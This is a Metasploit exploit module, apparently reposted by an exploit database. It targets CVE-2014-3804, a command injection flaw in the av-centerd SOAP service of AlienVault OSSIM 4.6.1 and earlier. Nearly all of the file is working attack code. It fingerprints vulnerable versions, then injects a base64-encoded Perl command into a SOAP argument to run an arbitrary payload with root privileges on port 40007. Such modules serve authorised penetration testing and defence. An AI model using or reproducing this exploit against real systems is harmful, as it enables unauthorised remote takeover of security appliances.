###########################

# AlienVault OSSIM av-centerd Command Injection

###########################

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rexml/document'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include REXML

def initialize(info = {})
super(update_info(info,
'Name' => 'AlienVault OSSIM av-centerd Command Injection',
'Description' => %q{
This module exploits a code execution flaw in AlienVault 4.6.1 and
prior. The vulnerability exists in the av-centerd SOAP web service,
where the update_system_info_debian_package method uses perl backticks
in an insecure way, allowing command injection. This module has been
tested successfully on AlienVault 4.6.0.
},
'Author' =>
[
'Unknown', # From HP ZDI team, Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-3804'],
['BID', '67999'],
['ZDI', '14-202'],
['URL', 'http://forums.alienvault.com/discussion/2690']
],
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
#'BadChars' => "[;`$<>|]", # Don't apply bcuz of the perl stub applied
'Compat' => {
'RequiredCmd' => 'perl netcat-e openssl python gawk'
}
},
'DefaultOptions' =>
{
'SSL' => true
},
'Targets' =>
[
[ 'AlienVault <= 4.6.1', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 5 2014'))

register_options(
[
Opt::RPORT(40007)
], self.class)
end

def check
version = ""
res = send_soap_request("get_dpkg")

if res &&
res.code == 200 &&
res.headers['SOAPServer'] &&
res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/

version = $1
end

if version.empty? || version >= "4.7.0"
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Appears
end
end

def exploit
send_soap_request("update_system_info_debian_package", 1)
end

def build_soap_request(method)
xml = Document.new
xml.add_element(
"soap:Envelope",
{
'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
'xmlns:soapenc' => "http://schemas.xmlsoap.org/soap/encoding/",
'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
'soap:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/",
'xmlns:soap' => "http://schemas.xmlsoap.org/soap/envelope/"
})
body = xml.root.add_element("soap:Body")
m = body.add_element(
method,
{
'xmlns' => "AV/CC/Util"
})
args = []
args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})
args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})
args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})
args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})
(0..3).each { |i| args[i].text = rand_text_alpha(4 + rand(4)) }

if method == "update_system_info_debian_package"
args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
perl_payload = "system(decode_base64"
perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
args[4].text = "#{rand_text_alpha(4 + rand(4))}"
args[4].text += " && perl -MMIME::Base64 -e '#{perl_payload}'"
end

xml.to_s
end

def send_soap_request(method, timeout = 20)
soap = build_soap_request(method)

res = send_request_cgi({
'uri' => '/av-centerd',
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap,
'headers' => {
'SOAPAction' => "\"AV/CC/Util##{method}\""
}
}, timeout)

res
end

end

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2014-06-28]

###########################